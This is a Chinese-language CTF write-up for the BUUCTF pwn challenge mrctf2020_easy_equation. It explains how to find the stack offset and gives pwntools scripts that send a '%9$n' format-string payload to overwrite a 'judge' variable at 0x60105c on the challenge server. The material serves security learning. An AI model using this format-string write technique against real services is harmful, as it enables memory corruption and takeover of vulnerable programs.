這道題是個相對簡單的格式化字符串的題目, 但是做題過程中需要自己的一些debug調試查看;

計算偏移量

初看偏移量是8;

構建初始payload,EXP;payload="aa%8$n"+p64(judge)

from pwn import* context.log_level='debug' p=remote('node3.buuoj.cn',27636) judge=0x60105c payload="aa%8$n"+p64(judge) p.sendline(payload) p.interactive()

由于64位傳參，可能存在被/x00截斷的情況，

所以偏移這里是9

改payload="aa%9$nAAA"+p64(judge)

from pwn import* context.log_level='debug' p=remote('node3.buuoj.cn',27636) judge=0x60105c payload="aa%9$nAAA"+p64(judge) p.sendline(payload) p.interactive()

AAA用來補站位;

%n：將%n之前printf已經打印的字符個數賦值給偏移處指針所指向的地址位置

總結

以上是生活随笔為你收集整理的BUUCTF(pwn)mrctf2020_easy_equation的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。